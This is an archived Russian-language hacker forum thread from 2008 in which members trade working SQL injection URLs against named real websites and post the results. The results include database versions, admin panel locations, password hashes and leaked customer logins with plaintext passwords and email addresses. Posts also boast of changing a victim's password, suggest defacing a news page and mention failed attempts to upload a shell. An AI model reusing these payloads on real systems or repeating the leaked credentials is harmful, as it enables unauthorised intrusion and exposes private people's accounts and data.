ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.07.2008, 19:10
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
пример того как умные програмеры хотят обмануть нас смертных что их сайт на хтмл
Constantine: mod_rewrite тебе ни о чем не говорит?
http://www.level.ro/stiri/2753+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,Version(),Database(),User()),0x71),0x71),2/*/tekken_6.html
Database Version: 4.1.21-standard
Database name: level_nou
User name: level@localhost
подобрал табелку user но колонки так и не смог 
http://autohit.ro/compare.php?modelId1=106+AND+ASCII(SUBSTRING((curr ent_database()),6,1))=xxx--
current_database() : autohit_ro
current_user() : autohit
version(): PostgreSQL
вывода нет, о можно побрутить сиптом, главное запрос правильно составить
не забывайте что тут есть Information_Schema или PG_TABLES
ну и конечно не забывайте что в
PostgreSQL оператор LIMIT сосоит из двух частей: LIMIT и OFFSET
табелки брутить не стал, оставляю это удовольствие вам 
Последний раз редактировалось Constantine; 24.07.2008 в 01:23..
|
|
|
23.07.2008, 23:45
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.2goroda.ru/
http://www.2goroda.ru/News/newsfp.php?n=-1+union+select+1,2,3,4,concat(username,0x3a,user_p assword)%20,6,7,8+from+phpbb_users+limit+4,10/*
Выискиваем: user:magnum pass:6666
меняем пас юзеру Master на 'anus'
Вроде как админка по адресу http://www.2goroda.ru/Poll/admin/index.php
Но таблу так и не подобрал на это дело.
Зы: Впервые вижу такого дибила, который на пасворд '6666' ставит =)
|
|
|
|
24.07.2008, 00:49
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Зы: Можно шуткануть - вставить в новость lo cation.href куда нить на anus.com =)
|
|
|
|
24.07.2008, 03:50
|
|
Постоянный
Регистрация: 06.05.2007
Сообщений: 393
Провел на форуме:
1510937
Репутация:
398
|
|
Код:
http://www.neilprydemaui.com/items.php?id=-48+union+select+1,2,concat_ws(0xEF,version()),4,5,6,7,8,9,10,11/*
|
|
|
|
24.07.2008, 08:46
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
color-style.ru
Код:
http://www.color-style.ru/catalogue.php?sect_id=3+and+substring(version(),1,1)=5/*
Database Version: 5.0.45-log
Database name: u91786
User name: u91786@10.10.153.164
таблица CUSTOMERS
login:passwd:email
[1]:admin:admin:
[2]:garry:qazzaq:garry@lit.botik.ru
[3]:ivan:ivan:ivan@ivan.com
[4]:nata:1:
[5]:anjelika:anjelika:
[6]:viktor:viktor:kva@mail.cbr.ru
...................................................
..................................................
[77]:alisa:alisa:
[78]:alisak:alisak:vitalsson@rambler.ru
[79]:Olga:030393:Smolyaninova_m@mail.ru
[80]:Arinako:Cfytxtr:Arinako@gmail.com
Ксожелению юзер пасс к админке в бд не храняться
(
|
|
|
|
24.07.2008, 11:44
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
В добовление к вчерашним Метео сайтам.
Не навиду Метео прогнозы вечно врут гады....
http://www.meteo-tv.ru
(Пожалуй самая популярная программа о погоде. Почти по всем каналам крутят)
http://www.meteo-tv.ru/news/item.php?newsID=-6869+union+select+1,2,concat(login,char(58),passwo rd),4,5,6,7+from+users+limit+1,1/*
admin:40bd001563085fc35165329ea1ff5c5ecbdbbeef
(Ну и форум туда же )
http://www.meteo-tv.ru/news/item.php?newsID=-6869+union+select+1,2,concat(username,char(58),use r_password),4,5,6,7+from+forum_users+limit+1,1/*
viking:a37c3645bb4a1ea0f112ad60b8e6a581
--------------------------------------------------------------------------------------------------------------
http://pogoda.ru.net/
(Тут появились некоторые сложности скуля есть, а вот с выводом проблемы нужны подзапросы если правельно мыслю....)
http://pogoda.ru.net/records.php?d=7'+union+select+1,2,3,4,5,6,7,8,9,10 ,11/*
--------------------------------------------------------------------------------------------------------------
http://www.meteo-gid.ru
(Еще один идиотский проэкт http://www.meteo-tv.ru)
С таблицами не стал мучиться если кому будет интересно думаю найдете =)
http://www.meteo-gid.ru/index.php?pageId=3&newsId=382+union+select+1,2,con cat(table_name,char(58),column_name,char(58),table _schema),4,5,6,7,8+from+information_schema.columns +limit+1,1/* |
|
|
|
24.07.2008, 13:43
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
www.agrifoodskills.net.au
user() = agrione@localhost
version() = 4.0.20a-nt
database() = agrirev
http://www.agrifoodskills.net.au/display_announce.php?id=44444444444441/**/union/**/select/**/concat_ws(0x3a,username,password)/**/from/**/users/**/limit/**/0,1/*
count from users = 139
ricktu:e1da02cc31d9a7ffaaf9d759cfe2c8fc
jane:b9a51726733fd31e3b4cd7dfb272f7fa
Justin Lazic:18cdeae7b347cc1518f4537476032435
justin:e10adc3949ba59abbe56e057f20f883e
kateb:2b10435032f537ce08893c0962878796
wendyskelton:e5e7105d5c05d9c0cc5944ff1341b533
...
...
админка = http://www.agrifoodskills.net.au/admin.php
но пароли не подходят :)
там еще и форум есть
|
|
|
|
24.07.2008, 16:17
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://presse.kaspersky.fr/presse.php?type=&article=&bibid=9999999999+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,name,password),9,10,11,version(),13,14,15,16++from+agora.agora_users/*
Mysql: 5.0.38-Dotdeb_1.dotdeb.0-log
User/password : support/9dd3ba637ec2fcaf383415617d39e002 |
|
|
|
24.07.2008, 19:11
|
|
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750
Репутация:
277
|
|
Код:
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,USER(),3,4,5,6,7/*
user: renewabl_webuser
имя БД: renewabl_mhpwebsite
но чтоб узнать пасс, надо знать таблу, для этого либо брутить, либбо информационная схема (не робит, ибо старый мускул), либо вручную угадать простые названия)) |
|
|
|
26.07.2008, 11:48
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
Сообщение от Xcontrol212
Код:
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,USER(),3,4,5,6,7/*
user: renewabl_webuser
имя БД: renewabl_mhpwebsite
но чтоб узнать пасс, надо знать таблу, для этого либо брутить, либбо информационная схема (не робит, ибо старый мускул), либо вручную угадать простые названия)) kubu:freedom
http://microhydropower.net/user/login_page.php админка
но шел залить ни как не удасцо (
и админка много не даст всё идет через mysql
надеюсь на респект )
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?786203){kind=avatar}
Комбинированный вид
